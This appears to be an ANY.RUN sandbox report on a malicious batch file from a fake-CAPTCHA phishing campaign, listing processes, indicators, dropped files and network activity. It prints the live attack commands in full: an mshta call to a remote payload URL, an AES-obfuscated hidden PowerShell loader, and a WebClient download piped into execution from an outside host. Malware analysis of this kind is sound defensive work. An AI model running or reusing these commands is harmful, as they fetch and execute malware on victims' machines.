File name:

test.bat

Full analysis: https://app.any.run/tasks/5f6f7f92-b304-4e6e-8b4b-cd5422c931cb
Verdict: Malicious activity
Analysis date: March 07, 2025, 20:44:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
phishing
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with no line terminators
MD5:

089D0A8E28892B8AEFC7819D56BF85CB

SHA1:

BE4233B1623BADA0AAC0E7EB827F9D533667B282

SHA256:

B57015E6C49A842FB912ED2FE880190DD5F086FF71EFBADBFBC57B1244752F0D

SSDEEP:

3:rN6eVucKA3KP4faR+FXOLE6N1HzNcRWLp:Z6e8iVfRXOnTuyp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Phishing has been detected

      • mshta.exe (PID: 5404)
    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 5404)
      • powershell.exe (PID: 7200)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 7200)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7756)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 7200)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 5404)
      • powershell.exe (PID: 7200)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 5404)
      • powershell.exe (PID: 7200)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 5404)
      • powershell.exe (PID: 7200)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 7200)
    • Probably download files using WebClient

      • powershell.exe (PID: 7200)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 5404)
    • Checks proxy server information

      • mshta.exe (PID: 5404)
      • powershell.exe (PID: 7756)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7200)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7200)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 7156)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7756)
    • Disables trace logs

      • powershell.exe (PID: 7756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
145
Monitored processes
12
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #PHISHING mshta.exe powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe no specs powershell.exe conhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
5404"C:\Windows\System32\mshta.exe" https://yezmire.online/lalaloopy.mp3 # ''Ι am nοt a rοbοt: гeСАРТСНА Verification ID: 71013C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
6468"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\kernel.appcore.dll
7156"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
7200"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7208\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7236"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
7328"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
7372C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7412"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7756"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
12 568
Read events
12 536
Write events
32
Delete events
0

Modification events

(PID) Process:(5404) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5404) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5404) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7756) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7756) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7756) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7756) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7756) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7756) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7756) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
14
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
5404mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\lalaloopy[1].mp3
MD5:
SHA256:
7156BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\85baebd8-48af-46cc-a410-16b7601e742f.down_data
MD5:
SHA256:
5404mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:51B17E85C5713E5E9AC1FD0F0DB2C9F7
SHA256:D99779638C6B949DA5204AF95AFD149EEA61D98AF38B081BCC6C31BB50D91CAB
5404mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:880CD35014FB18CBD4CD4DEE255941E9
SHA256:73F23524831F62ECF4AAC3A25BD6041F52C14A4D4E8830ECC86B8191E54C2F2F
7156BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:D8DDFC128D7D1B99C329077EDCADA9D1
SHA256:5D88C2DE18C388781C21A92B64BFFBDBE99D833444F66FD26411D438CF236A71
7756powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2vj22rya.sn1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7756powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2tzvvihk.r2f.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7156BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d2d7cc88-7b2a-4da6-85c2-c17910d591ce.up_meta_securebinary
MD5:30FA3E294DB6994FC32261D8F35FB093
SHA256:2D8CFFC8F21FFAED3D151A8796487760F0117B0F2D37D84173657FF9F8891370
5404mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:C9BE626E9715952E9B70F92F912B9787
SHA256:C13E8D22800C200915F87F71C31185053E4E60CA25DE2E41E160E09CD2D815D4
7200powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XI105KFCF7FPZ1NFCRUE.tempbinary
MD5:D2ED5E797EC05A6CA8908E7A135F2187
SHA256:EB3CC3E82A42AF07B26950801063FE468CA5BB580A970702956CEF18FE9A2D11
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
28
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5404
mshta.exe
GET
200
216.58.212.163:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
5404
mshta.exe
GET
200
216.58.212.163:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
7156
BackgroundTransferHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7660
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5680
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5680
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5404
mshta.exe
172.67.177.92:443
yezmire.online
CLOUDFLARENET
US
unknown
4
System
192.168.100.255:138
whitelisted
5404
mshta.exe
216.58.212.163:80
c.pki.goog
GOOGLE
US
whitelisted
6544
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
40.113.103.199:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7660
backgroundTaskHost.exe
20.223.35.26:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.174
whitelisted
yezmire.online
  • 172.67.177.92
  • 104.21.67.150
unknown
c.pki.goog
  • 216.58.212.163
whitelisted
login.live.com
  • 20.190.159.75
  • 40.126.31.1
  • 20.190.159.130
  • 20.190.159.68
  • 20.190.159.129
  • 20.190.159.0
  • 20.190.159.23
  • 40.126.31.129
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
client.wns.windows.com
  • 40.113.103.199
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
x72.eioae.shop
  • 172.67.173.214
  • 104.21.40.9
unknown
www.bing.com
  • 92.123.104.32
  • 92.123.104.61
  • 92.123.104.62
  • 92.123.104.59
  • 92.123.104.46
  • 92.123.104.63
  • 92.123.104.67
  • 92.123.104.64
  • 92.123.104.38
whitelisted

Threats

No threats detected
No debug info